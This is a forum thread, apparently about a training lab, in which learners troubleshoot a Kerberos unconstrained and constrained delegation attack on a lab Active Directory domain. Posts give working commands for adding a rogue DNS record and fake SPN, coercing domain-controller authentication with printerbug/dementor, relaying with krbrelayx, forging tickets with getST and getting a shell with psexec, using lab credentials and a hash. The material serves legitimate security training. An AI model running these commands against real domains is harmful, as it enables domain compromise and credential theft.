Hi all,
I had some hard time to reproduce the attack from the PwnBox. I gave it a try from my Kali lab machine and I did not encounter any issue. I could not force the DC to authenticate against my machine when performing the attack from PwnBox … not sure why.
Hi guys,
I would really appreciate some help with this section. Whenever I get to the part where I’m running dementor.py, or printerbug.py- I get an error on krbrelayx.py saying
“Unsupported MechType ‘NTLMSSP - Microsoft NTLM Security Support Provider’”
And essentially I’m not getting a TGT.
I tried every possible solution I could find online and I still cant figure it out.
I tried restarting the machine a few times, and also tried the lab both from the pwnbox and from my own kali lab.
-made sure that the hosts file has a record for inlanefreight.local and dc01.inlanefreight.local
-when creating the DNS record I used NSLOOKUP to make sure that it resolves to my IP
-when creating the fake SPN, I made sure that it exists by using addspn.py to query callum.dixon
-tried running krbrelayx.py with callum.dixon’s user/pass or hashes
-re-installed impacket
here are the commands I use:
python dnstool.py -u INLANEFREIGHT.LOCAL\carole.rose -p jasmine -r roguecomputer.INLANEFREIGHT.LOCAL -d --action add <DC_IP>
python addspn.py -u INLANEFREIGHT.LOCAL\carole.rose -p jasmine --target-type samname -t callum.dixon -s CIFS/roguecomputer.inlanefreight.local dc01.inlanefreight.local
(after these two steps I make sure that the dns a record got created and that the SPN has been added and everything seems fine)
sudo python krbrelayx.py -hashes :3E7C48255206470A13543B27B7AF18DE (also tried this command with callum.dixon’s username and pass)
python3 printerbug.py inlanefreight.local/carole.rose:jasmine@<dc_ip>roguecomputer.inlanefreight.local
OR
python3 dementor.py -u carole.rose -p jasmine -d inlanefreight.local roguecomputer.inlanefreight.local dc01.inlanefreight.local
would appreciate any help!!!
thank you
After spending 3 days on this one lab I finally managed to solve the issue by
specifying dc01 as the target which finally got a TGT for dc01$
sudo python krbrelayx.py -hashes :3E7C48255206470A13543B27B7AF18DE --target dc01.inlanefreight.local
I haven’t found this solution on any other forum so I hope this helps future generations 
that worked for me! thanks!
so ive got the ticket successfully but i keep getting “access denied” when trying to use smbclient or psexec … etc
this lab is stupid, for anyone who still can not finish this:
hi, @cbr0t .
Excuse my question. Did you have a problem running psexec.py in the Constrained Delegation module from Linux?
I have the following error:
Impacket v0.13.0.dev0+2024916.171021.65b774d - Copyright Fortra, LLC and its affiliated companies
[+] Impacket Library Installation Path: /usr/local/lib/python3.11/dist-packages/impacket
[+] StringBinding ncacn_np:DC01[\pipe\svcctl]
Traceback (most recent call last):
File “/usr/local/lib/python3.11/dist-packages/impacket/nmb.py”, line 900, in _setup_connection
af, socktype, proto, canonname, sa = socket.getaddrinfo(peer[0], peer[1], 0, socket.SOCK_STREAM)[0]
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
I added the domain controller’s IP in /etc/hosts/, then I ran an nslookup DC01.INLANEFREIGHT.LOCAL and it shows me this:
** server can’t find DC01.INLANEFREIGHT.LOCAL: NXDOMAIN
I checked /etc/resolve and added the domain lines and the error still persists.
not that i rememeber. no.
hi @v0idwalker .
i have a problem with this command:
──╼ [★]$ sudo python krbrelayx.py -hashes :3E7C48255206470A13543B27B7AF18DE --target dc01.inlanefreight.local
[] Protocol Client HTTPS loaded…
[] Protocol Client HTTP loaded…
[] Protocol Client LDAPS loaded…
[] Protocol Client LDAP loaded…
[] Protocol Client SMB loaded…
[] Running in attack mode to single host
[] Running in unconstrained delegation abuse mode using the specified credentials.
[] Setting up SMB Server
[] Setting up HTTP Server on port 80
[] Setting up DNS Server
[*] Servers started, waiting for connections
Exception in thread Thread-2:
Traceback (most recent call last):
File “/usr/lib/python3.11/threading.py”, line 1038, in _bootstrap_inner
self.run()
File “/usr/local/lib/python3.11/dist-packages/impacket/examples/ntlmrelayx/servers/httprelayserver.py”, line 560, in run
self.server = self.HTTPServer((self.config.interfaceIp, self.config.listeningPort), self.HTTPHandler, self.config)
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File “/usr/local/lib/python3.11/dist-packages/impacket/examples/ntlmrelayx/servers/httprelayserver.py”, line 47, in init
socketserver.TCPServer.init(self,server_address, RequestHandlerClass)
File “/usr/lib/python3.11/socketserver.py”, line 456, in init
self.server_bind()
File “/usr/lib/python3.11/socketserver.py”, line 472, in server_bind
self.socket.bind(self.server_address)
OSError: [Errno 98] Address already in use
I uninstall impacket and krbrelayx.py but i cant solved it.
can you help me?
hi @CrazyHorse302 and @Alt_F4, thanks for your tips. I got the flag.
Check if PwnBox has the right privileges and if DNS resolution matches Kali’s.
I’m running into the same issue and also completed the same troubleshooting steps. not sure what the issue is. did you ever resolve it?
hi @grai123, I solved it.
Can you send me the step by step that you did?
I followed the instructions in the module.
I used GetST with beth.richards credentials to craft a ticket, impersonating a local administrator, and exported that to the KR5CCNAME env variable:
getST.py -spn TERMSRV/DC01 'INLANEFREIGHT.LOCAL/beth.richards:B3thR!ch@rd -impersonate Administrator
export KRB5CCNAME=./Administrator.ccache
Then I used psexec to connect to DC01 as the local administrator
psexec.py -k -no-pass INLANEFREIGHT.LOCAL/administrator@DC01 -debug
And I get that same exact, socket error, you got. I to added the DC’s IP in /etc/hosts, and when I run dig or nslookup, it can’t find. I can ping it though. I tried this on my local kali VM and in pwnbox and I get the same result.
This is my entry in /etc/hosts
<ip> inlanefreight.local dc01.inlanefreight.local
I’ve tried different flags with psexec too, like -target-ip, -dc-ip, specifying “[email protected]”. At this point, I’m not sure of the exact issue.
ok, so I fixed a few things. I noticed when I run the getst impacket module, the ticket is saved in “Administrator@[email protected]”, not “Administrator.ccache” like in the example. So I changed the env variable accordingly:
export KRB5CCNAME=./Administrator@[email protected]
I was able to find this out by running the “klist” command.
This is the output of the command:
Ticket cache: FILE:./Administrator@[email protected]
Default principal: [email protected]
Valid starting Expires Service principal
02/20/2025 07:36:33 02/20/2025 17:36:33 TERMSRV/[email protected]
renew until 02/21/2025 07:36:32
Next, I also updated the psexec command, and specific the domain with the user like so:
/usr/bin/impacket-psexec -k -no-pass INLANEFREIGHT.LOCAL/[email protected] -debug
That seems to have fixed the connection issue. Now, I get a different error - preauth failed:
[+] Impacket Library Installation Path: /usr/lib/python3/dist-packages/impacket
[+] StringBinding ncacn_np:dc01.inlanefreight.local[\pipe\svcctl]
[+] Using Kerberos Cache: ./Administrator@[email protected]
[+] SPN CIFS/[email protected] not found in cache
[+] AnySPN is True, looking for another suitable SPN
[+] SPN KRBTGT/[email protected] not found in cache
[+] AnySPN is True, looking for another suitable SPN
[+] No valid credentials found in cache
[+] Trying to connect to KDC at INLANEFREIGHT.LOCAL:88
[+] Trying to connect to KDC at INLANEFREIGHT.LOCAL:88
[+] Server time (UTC): 2025-02-20 12:44:28
<SNIP>
impacket.krb5.kerberosv5.KerberosError: Kerberos SessionError: KDC_ERR_PREAUTH_FAILED(Pre-authentication information was invalid)
[-] Kerberos SessionError: KDC_ERR_PREAUTH_FAILED(Pre-authentication information was invalid)
I’ll try resetting the machine and going through the steps again
For anyone else who may come upon this thread, definitely follow the hints listed above to get around the issues you find when following the instructions, specifically adding additional flags. This includes the very last step, namely having to add -dc-ip.
The problem isn’t you, the instructions just don’t lead to success.